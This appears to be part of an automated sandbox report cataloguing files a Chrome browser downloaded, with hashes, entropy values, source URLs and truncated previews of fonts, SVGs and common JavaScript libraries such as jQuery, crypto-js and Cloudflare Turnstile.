                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                      Category:downloaded
                                                      Size (bytes):28584
                                                      Entropy (8bit):7.992563951996154
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:17081510F3A6F2F619EC8C6F244523C7
                                                      SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                      SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                      SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/78jvMDbEYo0v7D4767Xg16uv60
                                                      Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (9063), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):9063
                                                      Entropy (8bit):5.247125461362667
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5311AD7D419C27DA9AAE83274CA8B47C
                                                      SHA1:DAD2427B0DFA72586D78904C88D0A61510676780
                                                      SHA-256:D55E592BFD571C65AD775184995D0C09601F5172DD9E72C74F8285ED2BB19E6A
                                                      SHA-512:6FB4A315589509C3DE5F3CD729AE74E1817CA07958E97D807E730BF7207BD227DF8810165DB21A1DCAEC3A6775AC1B81625CCDD95A0E372FA26882B9FA4B70F0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/5692-7e770fbcd7920441.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5692],{89982:function(e){e.exports=function(e,n){for(var t=-1,r=null==e?0:e.length;++t<r&&!1!==n(e[t],t,e););return e}},9856:function(e,n,t){var r=t(77458),u=t(91502)(r);e.exports=u},94410:function(e,n,t){var r=t(320)();e.exports=r},77458:function(e,n,t){var r=t(94410),u=t(39406);e.exports=function(e,n){return e&&r(e,n,u)}},13715:function(e,n,t){var r=t(39100);e.exports=function(e){return"function"==typeof e?e:r}},91502:function(e,n,t){var r=t(10187);e.exports=function(e,n){return function(t,u){if(null==t)return t;if(!r(t))return e(t,u);for(var o=t.length,i=n?o:-1,l=Object(t);(n?i--:++i<o)&&!1!==u(l[i],i,l););return t}}},320:function(e){e.exports=function(e){return function(n,t,r){for(var u=-1,o=Object(n),i=r(n),l=i.length;l--;){var s=i[e?l:++u];if(!1===t(o[s],s,o))break}return n}}},29929:function(e,n,t){e.exports=t(86009)},86009:function(e,n,t){var r=t(89982),u=t(9856),o=t(13715),i=t(95059);e.exports=function(e,n){return(i(e)?r:
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):43596
                                                      Entropy (8bit):7.9952701440723475
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                      SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                      SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                      SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/89DytfEk0whFsBplDOkSdZcd2bzalVyz71
                                                      Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):1864
                                                      Entropy (8bit):5.222032823730197
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (42690)
                                                      Category:downloaded
                                                      Size (bytes):42691
                                                      Entropy (8bit):5.373060430099094
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:985094F1486391033426C17505182792
                                                      SHA1:D44FF6BEF2E3D9B2F6DEAA0170458B1AE39350D4
                                                      SHA-256:14B108C7F687C327D6AA759FD1D255A981D5D505B241B5B968B674E3BF50B2B9
                                                      SHA-512:D1A8015658A82AE64F2E93341B8CA15B0057DF298DF36ACB47188B330E0327CFE0392EE1FF94B9D3BE7BC7D689BDD536A86ADB873A7ADEDE10AE45AA9A9415DB
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js
                                                      Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function fr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):121793
                                                      Entropy (8bit):4.657555594185671
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:DF2A6450738285F553518B21C491332B
                                                      SHA1:73C9AE21F94B9BEE8677C5E4E23B92D2E4286273
                                                      SHA-256:E1F484BEA7B7F5F3C034033E5B41D082CE0C7A227EC004F1A85A74B2DC297FC3
                                                      SHA-512:52AE9DA1468D2A62C682925C5CCA35D86FF37E3083DD83AF2CF24D671FC50E58518DF382CE11E2E4C595DC02A84BBB24BEFA340DD8BCB1AA6EA1B5B0EF43B4EF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/3110-cf292b967533f59a.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3110],{53110:function(C,e,t){t.d(e,{sB:function(){return L},Z7:function(){return n},Xl:function(){return r},jo:function(){return s},Dj:function(){return d},F:function(){return o},U1:function(){return h},zJ:function(){return a},Uv:function(){return c},vY:function(){return f},A2:function(){return u},pg:function(){return F},_V:function(){return R},mp:function(){return g},Pp:function(){return k},nc:function(){return D},id:function(){return A},Tj:function(){return S},tU:function(){return z},KV:function(){return W},i7:function(){return I},mK:function(){return G},ut:function(){return E},JY:function(){return P},iM:function(){return _},Dl:function(){return T},L7:function(){return U},Wt:function(){return J},Bh:function(){return O},FY:function(){return X},IF:function(){return v},vJ:function(){return w},SR:function(){return M},dd:function(){return j},N4:function(){return H},FR:function(){return Z},s1:function(){return m},Tr:func
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (6022), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):6022
                                                      Entropy (8bit):5.214599877333279
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4CFF1FA813D4B72B9AB7D186FCFF537A
                                                      SHA1:6B444DCB2BB23302A46A59E6A3CF9A96C53E6A5E
                                                      SHA-256:C105B1C090EEC5372E1C1D987F3EFCE59110C8926000EB63ACE6300152E00844
                                                      SHA-512:7E00B1E42899EE71346AE39248DFBEB087AB8B330FAFD2DA05054DB1DCBAF2E6E42443BA59B25727D86654055323DC2796E607665A2D943085EA363B2FB0D3D9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/0e5ce63c-f81e4355e48a25a5.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8310],{62177:function(e,r,n){n.d(r,{LZ3:function(){return f},Pxu:function(){return h},VAA:function(){return u},XCv:function(){return a},Y4O:function(){return i},jXb:function(){return L},nQG:function(){return v},nWS:function(){return m}});var t=n(2265);function o(e,r){if(null==e)return{};var n,t,o={},l=Object.keys(e);for(t=0;t<l.length;t++)n=l[t],r.indexOf(n)>=0||(o[n]=e[n]);return o}var l=["color"],i=(0,t.forwardRef)(function(e,r){var n=e.color,i=o(e,l);return(0,t.createElement)("svg",Object.assign({width:"15",height:"15",viewBox:"0 0 15 15",fill:"none",xmlns:"http://www.w3.org/2000/svg"},i,{ref:r}),(0,t.createElement)("path",{d:"M6.85355 3.14645C7.04882 3.34171 7.04882 3.65829 6.85355 3.85355L3.70711 7H12.5C12.7761 7 13 7.22386 13 7.5C13 7.77614 12.7761 8 12.5 8H3.70711L6.85355 11.1464C7.04882 11.3417 7.04882 11.6583 6.85355 11.8536C6.65829 12.0488 6.34171 12.0488 6.14645 11.8536L2.14645 7.85355C1.95118 7.65829 1.95
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4927)
                                                      Category:downloaded
                                                      Size (bytes):6629
                                                      Entropy (8bit):5.346402347258145
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EDEC73A46F92F344BA28EF0B7DF51AB3
                                                      SHA1:B49EE032AF558EF78A23F3E3BD76E7E7DE0F81DA
                                                      SHA-256:A835DDF4415CB9B5480FC929B72E75FB993C14F94397996BEF9BEC432093F865
                                                      SHA-512:6442A5EC0F59667ADE6A577250BC9B6A9DAA25E3590708553A4314805174A41AE4B43BDFDE345F3B20505EFEA5E1BBB6CEDDD9C8606686B1C8FDD62FEDE853A9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/4567-8b9b549c7ffa1127.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4567],{57977:function(e,n,t){t.d(n,{Z:function(){return c}});var r=t(2265);/**. * @license lucide-react v0.376.0 - ISC. *. * This source code is licensed under the ISC license.. * See the LICENSE file in the root directory of this source tree.. */let u=e=>e.replace(/([a-z0-9])([A-Z])/g,"$1-$2").toLowerCase(),l=(...e)=>e.filter((e,n,t)=>!!e&&t.indexOf(e)===n).join(" ");/**. * @license lucide-react v0.376.0 - ISC. *. * This source code is licensed under the ISC license.. * See the LICENSE file in the root directory of this source tree.. */var o={xmlns:"http://www.w3.org/2000/svg",width:24,height:24,viewBox:"0 0 24 24",fill:"none",stroke:"currentColor",strokeWidth:2,strokeLinecap:"round",strokeLinejoin:"round"};/**. * @license lucide-react v0.376.0 - ISC. *. * This source code is licensed under the ISC license.. * See the LICENSE file in the root directory of this source tree.. */let i=(0,r.forwardRef)(({color:e="curren
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):91355
                                                      Entropy (8bit):5.154909433761061
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2CF2964F0D7AE77B565184C8B5DABFE3
                                                      SHA1:134E5373EB34E8C5A85F87116101CF5483ED32B4
                                                      SHA-256:DF5FACBF008A09AADE773E7A2EA833AB0A628347654543D9A05A2C7A73EAC6D5
                                                      SHA-512:8427B3841003F7781B56C23D0360DACA95BDA0D58A3EB1998D531C1B3D26145ACA65442833BBFB974D08A39CC067D7FAB5AFF956EB376EDF0E7A9F0708B112AE
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/70e0d97a-1310f3144ec49d59.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3572],{3654:function(e,t,n){n.d(t,{EH:function(){return tg},aV:function(){return tI},p:function(){return tf},tk:function(){return tL}});var o=n(19672),i=n(49975),s=n(49430);let r=function(e){for(var t=0;;t++)if(!(e=e.previousSibling))return t},l=function(e){let t=e.assignedSlot||e.parentNode;return t&&11==t.nodeType?t.host:t},d=null,a=function(e,t,n){let o=d||(d=document.createRange());return o.setEnd(e,null==n?e.nodeValue.length:n),o.setStart(e,t||0),o},c=function(e,t,n,o){return n&&(u(e,t,n,o,-1)||u(e,t,n,o,1))},h=/^(img|br|input|textarea|hr)$/i;function u(e,t,n,o,i){for(;;){if(e==n&&t==o)return!0;if(t==(i<0?0:f(e))){let n=e.parentNode;if(!n||1!=n.nodeType||p(e)||h.test(e.nodeName)||"false"==e.contentEditable)return!1;t=r(e)+(i<0?0:1),e=n}else{if(1!=e.nodeType||"false"==(e=e.childNodes[t+(i<0?-1:0)]).contentEditable)return!1;t=i<0?f(e):0}}}function f(e){return 3==e.nodeType?e.nodeValue.length:e.childNodes.length}fu
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (54699)
                                                      Category:downloaded
                                                      Size (bytes):57987
                                                      Entropy (8bit):5.149673310645632
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:88AAB1D7A320B8F12CEE8756763BEEB2
                                                      SHA1:944C262DB2BE9DDD5D93DA5DB7B8C5442F47171B
                                                      SHA-256:5B240F69E8B5FD8764CBB74AD544A9093014C36255BB3B1F7B682CE30394B34E
                                                      SHA-512:13C231C908C8AF3E73886C94C842EF14FC608A7B529F45B31D0DF153FF5A4917DD8EA7CBCF272862F4E2C32A01EB9DB2CB03ADD0782282C3916771EDC736BAB5
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/css/6d0c0cfe3de6aaa7.css
                                                      Preview:@font-face{font-family:__gee_c54a1f;src:url(/_next/static/media/04d4d49fd9dfaa3d-s.p.woff2) format("woff2");font-display:swap;font-weight:400;font-style:normal}@font-face{font-family:__gee_c54a1f;src:url(/_next/static/media/8cf3078e5df53bb7-s.p.woff2) format("woff2");font-display:swap;font-weight:400;font-style:italic}@font-face{font-family:__gee_c54a1f;src:url(/_next/static/media/59457a906aa58c18-s.p.woff2) format("woff2");font-display:swap;font-weight:700;font-style:normal}@font-face{font-family:__gee_c54a1f;src:url(/_next/static/media/784be080823aa19b-s.p.woff2) format("woff2");font-display:swap;font-weight:700;font-style:italic}@font-face{font-family:__gee_Fallback_c54a1f;src:local("Arial");ascent-override:96.22%;descent-override:24.10%;line-gap-override:0.00%;size-adjust:105.39%}.__className_c54a1f{font-family:__gee_c54a1f,__gee_Fallback_c54a1f}.ProseMirror .is-editor-empty:first-child:before,.ProseMirror .is-empty:before{content:attr(data-placeholder);float:left;color:var(--muted
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (63937)
                                                      Category:downloaded
                                                      Size (bytes):95673
                                                      Entropy (8bit):5.44498318155715
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5ACEB68649661DCF8DE3B1D4A20AB482
                                                      SHA1:ADA7090DDB2CED164100A03DF74AD8D77505131A
                                                      SHA-256:5D7E8B6DDF632E6DE740E07C51768E0D7BD38C303CB80AB0880F29C5EA5EB6E7
                                                      SHA-512:AB6FF786CB861FF79F8179854B3FA3C4A465F35F4415187D4100FBF7DFDBAB8811D40A00FE1C85FB033AB2CA124E9C83680DB7387B160C2B0A60E39B1D098A15
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/4727-0b75cdd320cd8909.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4727],{66033:function(t,e){"use strict";e.byteLength=function(t){var e=u(t),r=e[0],n=e[1];return(r+n)*3/4-n},e.toByteArray=function(t){var e,r,i=u(t),s=i[0],a=i[1],f=new o((s+a)*3/4-a),c=0,l=a>0?s-4:s;for(r=0;r<l;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],f[c++]=e>>16&255,f[c++]=e>>8&255,f[c++]=255&e;return 2===a&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,f[c++]=255&e),1===a&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,f[c++]=e>>8&255,f[c++]=255&e),f},e.fromByteArray=function(t){for(var e,n=t.length,o=n%3,i=[],s=0,a=n-o;s<a;s+=16383)i.push(function(t,e,n){for(var o,i=[],s=e;s<n;s+=3)i.push(r[(o=(t[s]<<16&16711680)+(t[s+1]<<8&65280)+(255&t[s+2]))>>18&63]+r[o>>12&63]+r[o>>6&63]+r[63&o]);return i.join("")}(t,s,s+16383>a?a:s+16383));return 1===o?i.push(r[(e=t[n-1])>>2]+r[e<<4&63]+"=="):2===o&&i.push(r[(e=(t[n-2]<<8)+t[n-1])>>10]+r[e>>4&63]+r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:downloaded
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (19384), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):19384
                                                      Entropy (8bit):5.249684195839483
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:59175AA101491F0F1A39D7EE96823A48
                                                      SHA1:1EFA4EE77E0F7E695484AF12EA9272FDD67EAE2F
                                                      SHA-256:3F5B793882B8BCE26C02F13871EDD8FDE9538C1C316963E0E5C7E7D5427D4BEB
                                                      SHA-512:C476B973CF75B0D8FC086DB6EB56A6EF0079D4027EFD8AB6AFDE1C4BE9AD31BC660215508CBBEACE7EDAA098C045F50F200F8AF77EF5528C8A3ABBAB98B3F710
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/2936-2dd6700e177554ee.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2936],{66674:function(e,t,n){n.d(t,{Ry:function(){return l}});var r=new WeakMap,o=new WeakMap,a={},u=0,c=function(e){return e&&(e.host||c(e.parentNode))},i=function(e,t,n,i){var l=(Array.isArray(e)?e:[e]).map(function(e){if(t.contains(e))return e;var n=c(e);return n&&t.contains(n)?n:(console.error("aria-hidden",e,"in not contained inside",t,". Doing nothing"),null)}).filter(function(e){return!!e});a[n]||(a[n]=new WeakMap);var d=a[n],s=[],f=new Set,p=new Set(l),v=function(e){!e||f.has(e)||(f.add(e),v(e.parentNode))};l.forEach(v);var m=function(e){!e||p.has(e)||Array.prototype.forEach.call(e.children,function(e){if(f.has(e))m(e);else{var t=e.getAttribute(i),a=null!==t&&"false"!==t,u=(r.get(e)||0)+1,c=(d.get(e)||0)+1;r.set(e,u),d.set(e,c),s.push(e),1===u&&a&&o.set(e,!0),1===c&&e.setAttribute(n,"true"),a||e.setAttribute(i,"true")}})};return m(t),f.clear(),u++,function(){s.forEach(function(e){var t=r.get(e)-1,a=d.get(e)-1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):48316
                                                      Entropy (8bit):5.6346993394709
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):36696
                                                      Entropy (8bit):7.988666025644622
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                      SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                      SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                      SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/230pdxJB0PbHz3NkQ1abs26JqmLemxy69
